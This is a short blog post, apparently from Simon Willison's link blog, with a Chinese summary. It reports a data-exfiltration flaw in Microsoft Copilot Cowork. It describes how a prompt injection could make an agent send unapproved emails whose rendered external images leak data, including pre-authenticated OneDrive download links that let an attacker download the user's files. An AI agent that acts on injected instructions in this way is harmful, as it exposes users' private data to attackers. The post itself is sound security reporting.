微软 Copilot Cowork 文件外泄问题Microsoft Copilot Cowork Exfiltrates Files
文章指出,微软的 Copilot Cowork 产品存在数据外泄风险。该产品允许智能代理系统访问敏感文件,可能使攻击者得以窃取数据。作者强调,设计智能代理系统时,防止数据外泄仍是最大挑战。微软的产品名称和具体功能被详细提及,以说明问题的严重性。结论是,开发者需加强对这类产品的安全审查。
Simon Willison
26th May 2026 - Link Blog
Microsoft Copilot Cowork Exfiltrates Files (via) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.
In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:
Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.
Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
需要完整排版与评论请前往来源站点阅读。